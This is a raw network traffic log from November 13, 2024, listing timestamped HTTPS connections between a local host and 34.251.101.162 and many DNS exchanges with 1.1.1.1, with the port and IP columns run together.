                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:17.599446058 CET4435001634.251.101.162192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:17.626667023 CET50017443192.168.2.1734.251.101.162
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:17.626714945 CET4435001734.251.101.162192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:17.626816034 CET50017443192.168.2.1734.251.101.162
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:17.627042055 CET50017443192.168.2.1734.251.101.162
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:17.627060890 CET4435001734.251.101.162192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:18.702675104 CET4435001734.251.101.162192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:18.703030109 CET50017443192.168.2.1734.251.101.162
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:18.703048944 CET4435001734.251.101.162192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:18.703408957 CET4435001734.251.101.162192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:18.703855038 CET50017443192.168.2.1734.251.101.162
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:18.703916073 CET4435001734.251.101.162192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:18.704071999 CET50017443192.168.2.1734.251.101.162
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:18.747339964 CET4435001734.251.101.162192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:18.944871902 CET4435001734.251.101.162192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:18.944952011 CET4435001734.251.101.162192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:18.945009947 CET50017443192.168.2.1734.251.101.162
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:18.945754051 CET50017443192.168.2.1734.251.101.162
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:18.945768118 CET4435001734.251.101.162192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:28:56.422385931 CET53549241.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:28:56.428670883 CET6506453192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:28:56.428847075 CET6290553192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:28:56.441170931 CET53650641.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:28:56.441180944 CET53629051.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:28:56.486299992 CET53521901.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:28:57.404319048 CET5456953192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:28:57.404319048 CET5522553192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:28:57.733145952 CET53505641.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:28:57.943727016 CET53545691.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:28:58.224303961 CET53552251.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:01.165375948 CET6215653192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:01.165601969 CET6222953192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:01.172250032 CET53621561.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:01.172672987 CET53622291.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:04.645173073 CET6274453192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:04.645427942 CET5151553192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:04.803235054 CET53627441.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:04.947940111 CET53515151.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.319380999 CET6313753192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.319560051 CET6503453192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.337538958 CET6489653192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.337678909 CET5735953192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.338211060 CET6293253192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.338362932 CET5427353192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.344575882 CET53648961.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.345207930 CET53573591.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.346007109 CET53542731.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.106856108 CET5766453192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.106996059 CET5276653192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.116213083 CET53527661.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.238811970 CET53561251.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.810400009 CET6209553192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.810568094 CET5082253192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.856405020 CET6346853192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.856564999 CET5387453192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.861032009 CET5772753192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.861488104 CET5009053192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.867661953 CET53634681.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.876272917 CET53538741.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.106508970 CET6552653192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.106899023 CET5514053192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.114598036 CET53655261.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.115823984 CET53551401.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:11.014821053 CET6076453192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:11.014985085 CET6321753192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:11.015656948 CET6539653192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:11.015866995 CET5907853192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:11.026118040 CET53607641.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:11.035794973 CET53632171.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:11.137501955 CET53556181.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:11.192941904 CET5754253192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:11.193125010 CET5488053192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:11.207684040 CET53548801.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:11.207703114 CET53575421.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:11.263899088 CET5134353192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:11.264043093 CET6411253192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:11.264448881 CET5055953192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:11.264632940 CET6362353192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:11.265002966 CET6462953192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:11.265444040 CET5224553192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:11.265444040 CET5293353192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:11.265851974 CET4924353192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:11.282845974 CET53636231.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:11.286459923 CET53497911.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:11.290632010 CET53641121.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:11.298357964 CET53505591.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:11.305058002 CET53513431.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:12.355619907 CET6242853192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:12.355789900 CET5520453192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:12.362545967 CET6387153192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:12.362938881 CET5685353192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:12.363282919 CET6447653192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:12.363467932 CET5289853192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:12.363955021 CET6185553192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:12.363955021 CET5504353192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:12.364085913 CET53552041.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:12.364130020 CET53624281.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:12.372340918 CET53568531.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:12.386812925 CET6046953192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:12.386812925 CET6066653192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:12.571336985 CET5999253192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:12.571337938 CET6227753192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:12.575752974 CET5636253192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:12.575752974 CET5175753192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:12.583668947 CET53517571.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:12.594527960 CET53563621.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:12.642869949 CET5932953192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:12.643018007 CET5616553192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:12.643456936 CET5089853192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:12.643547058 CET6283253192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:12.647058010 CET6035453192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:12.647244930 CET6507253192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:12.650944948 CET53561651.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:12.654268980 CET53650721.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.308866024 CET5364753192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.309040070 CET6246953192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.315442085 CET6465853192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.315699100 CET5261553192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.316603899 CET53536471.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.319459915 CET53624691.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.323065042 CET5788053192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.323667049 CET5647353192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.323853016 CET53646581.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.323868036 CET53526151.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.332278013 CET53578801.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.341759920 CET53564731.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.495224953 CET5804953192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.495435953 CET5208753192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.503499985 CET53520871.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.503609896 CET53580491.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.509042025 CET5712853192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.509196997 CET5889653192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.558469057 CET5436953192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.558661938 CET5150553192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.659977913 CET5189553192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.660154104 CET6432753192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.667705059 CET53643271.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.684154034 CET6319653192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.684154034 CET6456653192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.691442013 CET53645661.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.771857023 CET5699753192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.771940947 CET5866453192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.773720980 CET6208853192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.773853064 CET5108753192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.780028105 CET53569971.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.784020901 CET53586641.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.796546936 CET6407353192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.796546936 CET5401453192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.804439068 CET53540141.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.805422068 CET53640731.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.836523056 CET5808553192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.837162018 CET6376853192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.844415903 CET53637681.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.861535072 CET53648321.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.530327082 CET5621753192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.530664921 CET6349253192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.537704945 CET53562171.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.538031101 CET53634921.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.538664103 CET5767853192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.545929909 CET53576781.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.547856092 CET6448853192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.548098087 CET5907553192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.565220118 CET53644881.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.565566063 CET53590751.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.621176004 CET6546253192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.621340990 CET6183453192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.625338078 CET5099653192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.625515938 CET5049453192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.628921032 CET53618341.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.629683971 CET5073553192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.629975080 CET5290353192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.631309986 CET53654621.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.632275105 CET53509961.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.635011911 CET53504941.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.637878895 CET53507351.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.637893915 CET53529031.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.654098034 CET53604761.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.656941891 CET5532753192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.657103062 CET5837853192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.664176941 CET53583781.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.959814072 CET6209353192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.959942102 CET5344353192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.967170954 CET53534431.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.967185974 CET53620931.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.975090027 CET5454253192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.975388050 CET6039153192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.975600958 CET5617453192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.975753069 CET6003953192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.981813908 CET53545421.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.982671022 CET53561741.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.982949018 CET53600391.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.983339071 CET53603911.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.994450092 CET5921253192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.994575024 CET6388553192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.001272917 CET53592121.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.001400948 CET53638851.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.013305902 CET6061953192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.013439894 CET6090853192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.020468950 CET53606191.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.020894051 CET53609081.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.390630007 CET6331653192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.390773058 CET5478653192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.398514032 CET53633161.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.399465084 CET53547861.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.724603891 CET6284753192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.724821091 CET5740053192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.726790905 CET5915253192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.726854086 CET5705653192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.737445116 CET53628471.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.738162994 CET53574001.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.742809057 CET53591521.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.743793011 CET53570561.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.765047073 CET6445353192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.765228033 CET5444253192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.787735939 CET53644531.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.788917065 CET53544421.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.870628119 CET5119653192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.870764971 CET5403453192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.878066063 CET53511961.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.878278971 CET53540341.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.955984116 CET5636353192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.956198931 CET5382453192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.963023901 CET53563631.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.963083982 CET53538241.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.091661930 CET53559621.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.102703094 CET6536153192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.102703094 CET5520753192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.121324062 CET53552071.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.145618916 CET53653611.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.177546978 CET5806553192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.177546978 CET5300353192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.699918985 CET5005753192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.700042963 CET6056453192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.908674002 CET5828553192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.908837080 CET5828153192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.916418076 CET53582851.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.916604042 CET53582811.1.1.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.109719992 CET6292753192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.110619068 CET5420553192.168.2.171.1.1.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.117687941 CET53629271.1.1.1192.168.2.17
